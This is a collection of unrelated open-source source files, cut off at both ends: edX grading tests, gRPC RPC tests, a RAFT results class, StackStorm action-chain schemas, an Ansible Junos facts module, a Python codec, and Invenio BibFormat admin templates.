return BackendInfoExternal(backends=[])
if len(backend_info) > 1:
raise BadConfig("Only one 'backends' clause is allowed.")
info = backend_info[0]
if not info.backends:
return BackendInfoExternal(backends=[])
for backend in info.backends:
backend.Init()
return info
|
bsd-2-clause
|
nttks/edx-platform
|
common/lib/capa/capa/tests/test_correctmap.py
|
107
|
7116
|
"""
Tests to verify that CorrectMap behaves correctly
"""
import unittest
from capa.correctmap import CorrectMap
import datetime
class CorrectMapTest(unittest.TestCase):
"""
Tests to verify that CorrectMap behaves correctly
"""
def setUp(self):
super(CorrectMapTest, self).setUp()
self.cmap = CorrectMap()
def test_set_input_properties(self):
# Set the correctmap properties for three inputs
self.cmap.set(
answer_id='1_2_1',
correctness='correct',
npoints=5,
msg='Test message',
hint='Test hint',
hintmode='always',
queuestate={
'key': 'secretstring',
'time': '20130228100026'
}
)
self.cmap.set(
answer_id='2_2_1',
correctness='incorrect',
npoints=None,
msg=None,
hint=None,
hintmode=None,
queuestate=None
)
self.cmap.set(
answer_id='3_2_1',
correctness='partially-correct',
npoints=3,
msg=None,
hint=None,
hintmode=None,
queuestate=None
)
# Assert that each input has the expected properties
self.assertTrue(self.cmap.is_correct('1_2_1'))
self.assertFalse(self.cmap.is_correct('2_2_1'))
self.assertTrue(self.cmap.is_correct('3_2_1'))
self.assertTrue(self.cmap.is_partially_correct('3_2_1'))
self.assertFalse(self.cmap.is_partially_correct('2_2_1'))
# Intentionally testing an item that's not in cmap.
self.assertFalse(self.cmap.is_partially_correct('9_2_1'))
self.assertEqual(self.cmap.get_correctness('1_2_1'), 'correct')
self.assertEqual(self.cmap.get_correctness('2_2_1'), 'incorrect')
self.assertEqual(self.cmap.get_correctness('3_2_1'), 'partially-correct')
self.assertEqual(self.cmap.get_npoints('1_2_1'), 5)
self.assertEqual(self.cmap.get_npoints('2_2_1'), 0)
self.assertEqual(self.cmap.get_npoints('3_2_1'), 3)
self.assertEqual(self.cmap.get_msg('1_2_1'), 'Test message')
self.assertEqual(self.cmap.get_msg('2_2_1'), None)
self.assertEqual(self.cmap.get_hint('1_2_1'), 'Test hint')
self.assertEqual(self.cmap.get_hint('2_2_1'), None)
self.assertEqual(self.cmap.get_hintmode('1_2_1'), 'always')
self.assertEqual(self.cmap.get_hintmode('2_2_1'), None)
self.assertTrue(self.cmap.is_queued('1_2_1'))
self.assertFalse(self.cmap.is_queued('2_2_1'))
self.assertEqual(self.cmap.get_queuetime_str('1_2_1'), '20130228100026')
self.assertEqual(self.cmap.get_queuetime_str('2_2_1'), None)
self.assertTrue(self.cmap.is_right_queuekey('1_2_1', 'secretstring'))
self.assertFalse(self.cmap.is_right_queuekey('1_2_1', 'invalidstr'))
self.assertFalse(self.cmap.is_right_queuekey('1_2_1', ''))
self.assertFalse(self.cmap.is_right_queuekey('1_2_1', None))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', 'secretstring'))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', 'invalidstr'))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', ''))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', None))
def test_get_npoints(self):
# Set the correctmap properties for 4 inputs
# 1) correct, 5 points
# 2) correct, None points
# 3) incorrect, 5 points
# 4) incorrect, None points
# 5) correct, 0 points
# 4) partially correct, 2.5 points
# 5) partially correct, None points
self.cmap.set(
answer_id='1_2_1',
correctness='correct',
npoints=5.3
)
self.cmap.set(
answer_id='2_2_1',
correctness='correct',
npoints=None
)
self.cmap.set(
answer_id='3_2_1',
correctness='incorrect',
npoints=5
)
self.cmap.set(
answer_id='4_2_1',
correctness='incorrect',
npoints=None
)
self.cmap.set(
answer_id='5_2_1',
correctness='correct',
npoints=0
)
self.cmap.set(
answer_id='6_2_1',
correctness='partially-correct',
npoints=2.5
)
self.cmap.set(
answer_id='7_2_1',
correctness='partially-correct',
npoints=None
)
# Assert that we get the expected points
# If points assigned --> npoints
# If no points assigned and correct --> 1 point
# If no points assigned and partially correct --> 1 point
# If no points assigned and incorrect --> 0 points
self.assertEqual(self.cmap.get_npoints('1_2_1'), 5.3)
self.assertEqual(self.cmap.get_npoints('2_2_1'), 1)
self.assertEqual(self.cmap.get_npoints('3_2_1'), 5)
self.assertEqual(self.cmap.get_npoints('4_2_1'), 0)
self.assertEqual(self.cmap.get_npoints('5_2_1'), 0)
self.assertEqual(self.cmap.get_npoints('6_2_1'), 2.5)
self.assertEqual(self.cmap.get_npoints('7_2_1'), 1)
def test_set_overall_message(self):
# Default is an empty string string
self.assertEqual(self.cmap.get_overall_message(), "")
# Set a message that applies to the whole question
self.cmap.set_overall_message("Test message")
# Retrieve the message
self.assertEqual(self.cmap.get_overall_message(), "Test message")
# Setting the message to None --> empty string
self.cmap.set_overall_message(None)
self.assertEqual(self.cmap.get_overall_message(), "")
def test_update_from_correctmap(self):
# Initialize a CorrectMap with some properties
self.cmap.set(
answer_id='1_2_1',
correctness='correct',
npoints=5,
msg='Test message',
hint='Test hint',
hintmode='always',
queuestate={
'key': 'secretstring',
'time': '20130228100026'
}
)
self.cmap.set_overall_message("Test message")
# Create a second cmap, then update it to have the same properties
# as the first cmap
other_cmap = CorrectMap()
other_cmap.update(self.cmap)
# Assert that it has all the same properties
self.assertEqual(
other_cmap.get_overall_message(),
self.cmap.get_overall_message()
)
self.assertEqual(
other_cmap.get_dict(),
self.cmap.get_dict()
)
def test_update_from_invalid(self):
# Should get an exception if we try to update() a CorrectMap
# with a non-CorrectMap value
invalid_list = [None, "string", 5, datetime.datetime.today()]
for invalid in invalid_list:
with self.assertRaises(Exception):
self.cmap.update(invalid)
|
agpl-3.0
|
fichter/grpc
|
src/python/grpcio_test/grpc_test/framework/interfaces/face/_blocking_invocation_inline_service.py
|
3
|
10601
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test code for the Face layer of RPC Framework."""
import abc
import unittest
# test_interfaces is referenced from specification in this module.
from grpc.framework.interfaces.face import face
from grpc_test.framework.common import test_constants
from grpc_test.framework.common import test_control
from grpc_test.framework.common import test_coverage
from grpc_test.framework.interfaces.face import _digest
from grpc_test.framework.interfaces.face import _stock_service
from grpc_test.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
class TestCase(test_coverage.Coverage, unittest.TestCase):
"""A test of the Face layer of RPC Framework.
Concrete subclasses must have an "implementation" attribute of type
test_interfaces.Implementation and an "invoker_constructor" attribute of type
_invocation.InvokerConstructor.
"""
__metaclass__ = abc.ABCMeta
NAME = 'BlockingInvocationInlineServiceTest'
def setUp(self):
"""See unittest.TestCase.setUp for full specification.
Overriding implementations must call this implementation.
"""
self._control = test_control.PauseFailControl()
self._digest = _digest.digest(
_stock_service.STOCK_TEST_SERVICE, self._control, None)
generic_stub, dynamic_stubs, self._memo = self.implementation.instantiate(
self._digest.methods, self._digest.inline_method_implementations, None)
self._invoker = self.invoker_constructor.construct_invoker(
generic_stub, dynamic_stubs, self._digest.methods)
def tearDown(self):
"""See unittest.TestCase.tearDown for full specification.
Overriding implementations must call this implementation.
"""
self.implementation.destantiate(self._memo)
def testSuccessfulUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
response = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
test_messages.verify(request, response, self)
def testSuccessfulUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(request, responses, self)
def testSuccessfulStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
test_messages.verify(requests, response, self)
def testSuccessfulStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(requests, responses, self)
def testSequentialInvocations(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
first_request = test_messages.request()
second_request = test_messages.request()
first_response = self._invoker.blocking(group, method)(
first_request, test_constants.LONG_TIMEOUT)
test_messages.verify(first_request, first_response, self)
second_response = self._invoker.blocking(group, method)(
second_request, test_constants.LONG_TIMEOUT)
test_messages.verify(second_request, second_response, self)
@unittest.skip('Parallel invocations impossible with blocking control flow!')
def testParallelInvocations(self):
raise NotImplementedError()
@unittest.skip('Parallel invocations impossible with blocking control flow!')
def testWaitingForSomeButNotAllParallelInvocations(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestStreamResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestStreamResponse(self):
raise NotImplementedError()
def testExpiredUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(group, method)(
request, test_constants.SHORT_TIMEOUT)
def testExpiredUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.SHORT_TIMEOUT)
list(response_iterator)
def testExpiredStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(group, method)(
iter(requests), test_constants.SHORT_TIMEOUT)
def testExpiredStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.SHORT_TIMEOUT)
list(response_iterator)
def testFailedUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
def testFailedUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
list(response_iterator)
def testFailedStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
def testFailedStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
list(response_iterator)
|
bsd-3-clause
|
mfazliazran/raft
|
analysis/resultsclasses/AnalysisResults.py
|
11
|
6849
|
#
# Author: Justin Engler
#
# Copyright (c) 2011 RAFT Team
#
# This file is part of RAFT.
#
# RAFT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RAFT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RAFT. If not, see <http://www.gnu.org/licenses/>.
from .ResultSet import ResultSet
from .SingleResult import SingleResult
from PyQt4.QtGui import *
from PyQt4.QtCore import Qt
class AnalysisResults(object):
"""Contains all results found for a given analysis."""
def __init__(self , resultfactory=None):
"""Results that span across multiple pages"""
self.overall={}
"""Results that apply to a single page"""
self.pages={}
"""pages scanned with no results"""
self.nofindings={}
"""counts of total results within each grouping"""
self.resultcounts={'Overall':0,'Page':0,'No':0}
self.desc=None
self.friendlyname=None
self.analyzerclass=None
self.resultfactory=resultfactory
#############################Standard Functions
#############################Functions often used when writing an analyzer
def addPageResult(self, pageid, url, type, desc, data, span=None, severity=None, certainty=None, highlightdata=None):
"""Adds a new per-page standard result to the given pageid for this analysis"""
self.addCustomPageResult(pageid,
SingleResult(type, desc, data, span, severity, certainty, highlightdata=highlightdata),url)
def addOverallResult(self, type, desc, data, span=None, severity=None, certainty=None, context=None, highlightdata=None):
"""Adds a new overall result to this analysis"""
self.addCustomOverallResult(SingleResult(type, desc, data, span, severity, certainty, highlightdata=highlightdata),context)
#############################Special Functions
#############################You shouldn't need to call these unless you're doing something crazy.
def addCustomPageResult(self,pageid,result,url):
if pageid not in self.pages:
self.pages[pageid]=ResultSet(pageid,False,url)
self.pages[pageid].addResult(result)
def addCustomOverallResult(self,result,context):
"""Adds an arbitrary result object to the overall results."""
if context not in self.overall:
self.overall[context]=ResultSet(None,True,context)
self.overall[context].addResult(result)
def setAnalyzerInfo(self, newdesc,newfriendlyname, newanalyzerclass):
self.desc=newdesc
self.friendlyname=newfriendlyname
self.analyzerclass=newanalyzerclass
def toHTML(self):
"""returns an HTML representation of the entire analysis"""
finaloutput=self.generalInfoToHTML()
if len(self.overall) > 0:
finaloutput+='<h2>Overall Results</h2>'
for k in list(self.overall.keys()):
finaloutput+=self.overall[k].toHTML()
if len(self.pages)>0:
finaloutput+='<h2>Results for each page analyzed</h2>'
for k in list(self.pages.keys()):
finaloutput+=self.pages[k].toHTML()
return finaloutput
def generalInfoToHTML(self):
"""Returns an HTML 'header' string describing the test performed"""
outstring="""<h1>%s</h1>
<p>(%s)</p>
<p>%s</p>
"""%(self.friendlyname,self.analyzerclass,self.desc)
return outstring
def generateTreeItem(self,parentnode):
tempitem=QTreeWidgetItem(parentnode)
tempitem.setText(0,str(self.friendlyname))
tempitem.setText(1,"".join((str(self.numresults),' results')))
tempitem.setFlags(Qt.ItemIsEnabled|Qt.ItemIsSelectable)
tempitem.customdata=self
return tempitem
def generateTreeChildren(self,db,cursor,parentnode):
if self.resultfactory is not None:
factoryitems=self.resultfactory.createItems(self, self.instanceid,db,cursor)
self.resultcounts, self.overall, self.pages, self.nofindings = factoryitems
else:
#If this tree item came from the db, and we haven't populated it yet, populate it.
if self.dbgenerated and not self.dbretrieved:
resultsets=db.analysis_get_resultsets_per_instance(cursor,self.instanceid)
for resultset in resultsets:
numresults=resultset[5]
if resultset[2]:
store=self.overall
storekey=resultset[3]
self.resultcounts['Overall']+=numresults
tempRS=ResultSet(storekey,None,True)
elif numresults>0:
store=self.pages
storekey=resultset[1]
self.resultcounts['Page']+=numresults
tempRS=ResultSet(resultset[3],storekey,False)
else:
store=self.nofindings
storekey=resultset[1]
tempRS=ResultSet(resultset[3],storekey,False)
tempRS.dbgenerated=True
tempRS.dbretrieved=False
tempRS.resultsetid=resultset[0]
tempRS.numresults=resultset[5]
store[storekey]=tempRS
self.dbretrieved=True
#Now that the tree is populated, make the nodes
childnodes=list()
for name,store in (('Overall',self.overall),('Page',self.pages), ('No',self.nofindings)):
storelen=len(store)
if storelen>0:
tempitem=QTreeWidgetItem(parentnode)
tempitem.setText(0,'%s Results'%name)
tempitem.setText(1,'%s results in %s set%s'%(self.resultcounts[name],str(storelen),'s' if storelen>1 else ''))
tempitem.setFlags(Qt.ItemIsEnabled|Qt.ItemIsSelectable)
childnodes.append(tempitem)
for k in store:
store[k].generateTreeItem(tempitem)
|
gpl-3.0
|
dennybaa/st2
|
st2common/st2common/models/system/actionchain.py
|
8
|
5983
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import string
from st2common.util import schema as util_schema
from st2common.models.api.notification import NotificationSubSchemaAPI
class Node(object):
schema = {
"title": "Node",
"description": "Node of an ActionChain.",
"type": "object",
"properties": {
"name": {
"description": "The name of this node.",
"type": "string",
"required": True
},
"ref": {
"type": "string",
"description": "Ref of the action to be executed.",
"required": True
},
"params": {
"type": "object",
"description": ("Parameter for the execution (old name, here for backward "
"compatibility reasons)."),
"default": {}
},
"parameters": {
"type": "object",
"description": "Parameter for the execution.",
"default": {}
},
"on-success": {
"type": "string",
"description": "Name of the node to invoke on successful completion of action"
" executed for this node.",
"default": ""
},
"on-failure": {
"type": "string",
"description": "Name of the node to invoke on failure of action executed for this"
" node.",
"default": ""
},
"publish": {
"description": "The variables to publish from the result. Should be of the form"
" name.foo. o1: {{node_name.foo}} will result in creation of a"
" variable o1 which is now available for reference through"
" remainder of the chain as a global variable.",
"type": "object",
"patternProperties": {
"^\w+$": {}
}
},
"notify": {
"description": "Notification settings for action.",
"type": "object",
"properties": {
"on-complete": NotificationSubSchemaAPI,
"on-failure": NotificationSubSchemaAPI,
"on-success": NotificationSubSchemaAPI
},
"additionalProperties": False
}
},
"additionalProperties": False
}
def __init__(self, **kw):
for prop in six.iterkeys(self.schema.get('properties', [])):
value = kw.get(prop, None)
# having '-' in the property name lead to challenges in referencing the property.
# At hindsight the schema property should've been on_success rather than on-success.
prop = string.replace(prop, '-', '_')
setattr(self, prop, value)
def validate(self):
params = getattr(self, 'params', {})
parameters = getattr(self, 'parameters', {})
if params and parameters:
msg = ('Either "params" or "parameters" attribute needs to be provided, but not '
'both')
raise ValueError(msg)
return self
def get_parameters(self):
# Note: "params" is old deprecated attribute which will be removed in a future release
params = getattr(self, 'params', {})
parameters = getattr(self, 'parameters', {})
return parameters or params
def __repr__(self):
return ('<Node name=%s, ref=%s, on-success=%s, on-failure=%s>' %
(self.name, self.ref, self.on_success, self.on_failure))
class ActionChain(object):
schema = {
"title": "ActionChain",
"description": "A chain of sequentially executed actions.",
"type": "object",
"properties": {
"chain": {
"description": "The chain.",
"type": "array",
"items": [Node.schema],
"required": True
},
"default": {
"type": "string",
"description": "name of the action to be executed."
},
"vars": {
"description": "",
"type": "object",
"patternProperties": {
"^\w+$": {}
}
}
},
"additionalProperties": False
}
def __init__(self, **kw):
util_schema.validate(instance=kw, schema=self.schema, cls=util_schema.CustomValidator,
use_default=False, allow_default_none=True)
for prop in six.iterkeys(self.schema.get('properties', [])):
value = kw.get(prop, None)
# special handling for chain property to create the Node object
if prop == 'chain':
nodes = []
for node in value:
ac_node = Node(**node)
ac_node.validate()
nodes.append(ac_node)
value = nodes
setattr(self, prop, value)
|
apache-2.0
|
peter-jang/ansible-modules-core
|
network/junos/junos_facts.py
|
19
|
4038
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: junos_facts
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Collect facts from remote device running Junos
description:
- Collects fact information from a remote device running the Junos
operating system. By default, the module will collect basic fact
information from the device to be included with the hostvars.
Additional fact information can be collected based on the
configured set of arguments.
extends_documentation_fragment: junos
options:
config:
description:
- The C(config) argument instructs the fact module to collect
the configuration from the remote device. The configuration
is then included in return facts. By default, the configuration
is returned as text. The C(config_format) can be used to return
different Junos configuration formats.
required: false
default: null
config_format:
description:
- The C(config_format) argument is used to specify the desired
format of the configuration file. Devices support three
configuration file formats. By default, the configuration
from the device is returned as text. The other options include
set and xml. If the xml option is choosen, the configuration file
is returned as both xml and json.
required: false
default: text
choices: ['xml', 'text', 'set']
requirements:
- junos-eznc
notes:
- This module requires the netconf system service be enabled on
the remote device being managed
"""
EXAMPLES = """
# the required set of connection arguments have been purposely left off
# the examples for brevity
- name: collect default set of facts
junos_facts:
- name: collect default set of facts and configuration
junos_facts:
config: yes
- name: collect default set of facts and configuration in set format
junos_facts:
config: yes
config_format: set
- name: collect default set of facts and configuration in XML and JSON format
junos_facts:
config: yes
config_format: xml
"""
RETURN = """
ansible_facts:
descrption: Returns the facts collect from the device
returned: always
type: dict
"""
def main():
""" Main entry point for AnsibleModule
"""
spec = dict(
config=dict(type='bool'),
config_format=dict(default='text', choices=['xml', 'set', 'text']),
transport=dict(default='netconf', choices=['netconf'])
)
module = get_module(argument_spec=spec,
supports_check_mode=True)
result = dict(changed=False)
facts = module.get_facts()
if '2RE' in facts:
facts['has_2RE'] = facts['2RE']
del facts['2RE']
facts['version_info'] = dict(facts['version_info'])
if module.params['config'] is True:
config_format = module.params['config_format']
resp_config = module.get_config( config_format=config_format)
if config_format in ['text', 'set']:
facts['config'] = resp_config
elif config_format == "xml":
facts['config'] = xml_to_string(resp_config)
facts['config_json'] = xml_to_json(resp_config)
result['ansible_facts'] = facts
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.junos import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
381426068/MissionPlanner
|
Lib/encodings/unicode_internal.py
|
103
|
1241
|
""" Python 'unicode-internal' Codec
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
class Codec(codecs.Codec):
# Note: Binding these as C functions will result in the class not
# converting them to methods. This is intended.
encode = codecs.unicode_internal_encode
decode = codecs.unicode_internal_decode
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.unicode_internal_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.unicode_internal_decode(input, self.errors)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='unicode-internal',
encode=Codec.encode,
decode=Codec.decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
|
gpl-3.0
|
lnielsen/invenio
|
invenio/legacy/bibformat/templates.py
|
3
|
75703
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""HTML Templates for BibFormat administration"""
__revision__ = "$Id$"
# non Invenio imports
import cgi
from flask import url_for
# Invenio imports
from invenio.base.i18n import gettext_set_language
from invenio.config import CFG_SITE_URL, CFG_SITE_SECURE_URL
from invenio.base.i18n import language_list_long
MAX_MAPPINGS = 100 #show max this number of mappings on one page
class Template(object):
"""Templating class, refer to bibformat.py for examples of call"""
def tmpl_admin_index(self, ln, warnings, is_admin):
"""
Returns the main BibFormat admin page.
@param ln: language
@param warnings: a list of warnings to display at top of page. None if no warning
@param is_admin: indicate if user is authorized to use BibFormat
@return: main BibFormat admin page
"""
_ = gettext_set_language(ln) # load the right message language
out = ''
if warnings:
out += '''
<table width="66%%" class="errorbox" style="margin-left: auto; margin-right: auto;">
<tr>
<th class="errorboxheader">
%(warnings)s
</th>
</tr>
</table>
''' % {'warnings': '<br/>'.join(warnings)}
out += '''
<p>
This is where you can edit the formatting styles available for the records. '''
if not is_admin:
out += '''You need to
<a href="%(siteurl)s/youraccount/login?referer=%(siteurl)s/admin/bibformat/bibformatadmin.py">login</a> to enter.
''' % {'siteurl': CFG_SITE_URL}
out += '''
</p>
<dl>
<dt><a href="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_templates_manage?ln=%(ln)s">Manage Format Templates</a></dt>
<dd>Define how to format a record.</dd>
</dl>
<dl>
<dt><a href="%(siteurl)s/admin/bibformat/bibformatadmin.py/output_formats_manage?ln=%(ln)s">Manage Output Formats</a></dt>
<dd>Define which template is applied to which record for a given output.</dd>
</dl>
<br/>
<dl>
<dt><a href="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_elements_doc?ln=%(ln)s">Format Elements Documentation</a></dt>
<dd>Documentation of the format elements to be used inside format templates.</dd>
</dl>
<dl>
<dt><a href="%(siteurl)s/help/admin/bibformat-admin-guide">BibFormat Admin Guide</a></dt>
<dd>Documentation about BibFormat administration</dd>
</dl>
'''% {'siteurl': CFG_SITE_URL, 'ln': ln}
return out
def tmpl_admin_format_template_show_attributes(self, ln, name, description, filename, editable,
all_templates=[], new=False):
"""
Returns a page to change format template name and description
If template is new, offer a way to create a duplicate from an
existing template
@param ln: language
@param name: the name of the format
@param description: the description of the format
@param filename: the filename of the template
@param editable: True if we let user edit, else False
@param all_templates: a list of tuples (filename, name) of all other templates
@param new: if True, the format template has just been added (is new)
@return: editor for 'format'
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
out += '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(close_editor)s</a></small> </td>
<td>1. <small><a href="format_template_show?ln=%(ln)s&bft=%(filename)s">%(template_editor)s</a></small> </td>
<td>2. <small>%(modify_template_attributes)s</small> </td>
<td>3. <small><a href="format_template_show_dependencies?ln=%(ln)s&bft=%(filename)s">%(check_dependencies)s</a></small> </td>
</tr>
</table><br/>
''' % {'ln': ln,
'menu': _("Menu"),
'filename': filename,
'close_editor': _("Close Editor"),
'modify_template_attributes': _("Modify Template Attributes"),
'template_editor': _("Template Editor"),
'check_dependencies': _("Check Dependencies")
}
disabled = ""
readonly = ""
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
out += '''
<form action="format_template_update_attributes?ln=%(ln)s&bft=%(filename)s" method="POST">
''' % {'ln': ln,
'filename': filename}
if new:
#Offer the possibility to make a duplicate of existing format template code
out += '''
<table><tr>
<th class="adminheaderleft">Make a copy of format template: [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#addFormatTemplate">?</a>]</th>
</tr>
<tr>
<td><select tabindex="1" name="duplicate" id="duplicate" %(readonly)s>
<option value="">None (Blank Page)</option>
<option value="" disabled="disabled">-------------</option>
''' % {'siteurl': CFG_SITE_URL,
'readonly': readonly}
for o_filename, o_name in all_templates:
